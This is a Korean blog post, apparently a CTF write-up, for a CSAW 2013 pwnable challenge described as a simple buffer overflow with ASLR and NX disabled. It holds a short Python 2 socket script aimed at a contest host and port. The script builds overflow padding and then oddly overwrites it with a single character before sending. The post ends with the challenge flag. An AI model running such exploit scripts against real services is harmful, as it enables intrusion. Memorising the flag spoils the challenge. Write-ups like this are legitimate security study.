고정 헤더 영역
상세 컨텐츠
본문
반응형
csaw대회에서 비교적 쉬운 포너블 문제로 생애 처음으로 ctf중에 리모트 쉘을 따는것을 성공했다.
아 물론 이 문제는 아니지만.. ㅎㅎ
한줄요약 : Simple Buffer Overflow
exploit1Aslr : Off (fork())
NX : Off (execstack : X)
from Tkinter import Tk
from socket import *
import time
HOST = "128.238.66.212"
PORT = 31337
a = "A"*1016
a = '1'
print "[*] Sending Exploit Codes.."
s = socket(AF_INET,SOCK_STREAM)
s.connect((HOST,PORT))
s.recv(12070)
time.sleep(0.4)
s.send(a)
time.sleep(0.4)
print s.recv(12070)
raw_input("\nok?")
#{7c1fbb502632bffa6e62ba6fa847681f}
반응형
'0x10 정보보안 > 0x13 Write-Up' 카테고리의 다른 글
| 2013 CSAW CTF Exploitation 300 [exploit] (0) | 2013.09.23 |
|---|---|
| 2013 CSAW CTF Exploitation 200 [exploit] (0) | 2013.09.23 |
| 2013 WhiteHatContest 단체전 WEB 150 Serial2 풀이 Write_up (0) | 2013.09.18 |
| 2013 YISF 순천향대학교 해킹방어대회 예선 문제풀이 (8) | 2013.08.21 |
| 2013 juniorCTF Level9 write-up (0) | 2013.07.29 |
